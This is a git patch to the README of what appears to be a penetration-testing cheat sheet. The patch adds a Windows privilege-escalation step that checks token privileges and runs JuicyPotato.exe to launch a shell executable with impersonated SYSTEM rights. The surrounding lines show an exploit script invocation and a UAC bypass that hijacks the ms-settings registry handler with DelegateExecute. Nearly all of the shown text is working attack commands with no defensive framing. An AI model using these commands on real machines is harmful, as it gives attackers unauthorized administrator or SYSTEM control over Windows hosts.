From e24ab279de9ee48a81c966418553f6504a63a5ca Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Mon, 26 Sep 2022 09:40:05 -0400 Subject: [PATCH] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 1c096ef..bd19d9a 100644 --- a/README.md +++ b/README.md @@ -893,6 +893,12 @@ python3 exploit.py whoami net user {USERNAME} +# Check Privledges for Impersonation +whoami /priv +JuicyPotato.exe -l 1337 -p C:\Users\Public\Downloads\shell.exe -t * -c {CLSID} + +https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md + # UAC BYPASS New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value {C:\Path\to\Exploit\exploit.exe} -Force New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force